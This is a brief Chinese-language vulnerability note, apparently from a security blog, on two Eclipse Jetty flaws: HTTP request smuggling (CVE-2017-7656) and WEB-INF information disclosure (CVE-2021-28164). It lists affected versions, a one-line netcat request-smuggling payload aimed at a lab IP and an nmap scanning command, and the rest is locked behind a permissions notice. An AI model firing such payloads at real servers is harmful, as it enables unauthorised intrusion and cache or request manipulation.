(CVE-2017-7656)(CVE-2021-28164)
EclipseJettyHTTP请求走私漏洞(CVE-2017-7656)
影响版本:Jetty 9.2.x <= 9.2.26、9.3.x <= 9.3.23 和 9.4.0 <= 9.4.2
payload:echo -e “GET / HTTP/1.1\r\nHost: 10.46.36.17:8162\r\n\r\nGET https://www.taobao.com HTTP/1.1\r\nHost: www.baidu.com\r\nContent-Length: 0\r\n” | nc 192.168.85.132 80
Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)
影响范围:Jetty 7.0.0到9.4.39版本
信息收集:nmap 192.168.85.130 -A
您没有 权限 查看此处内容!
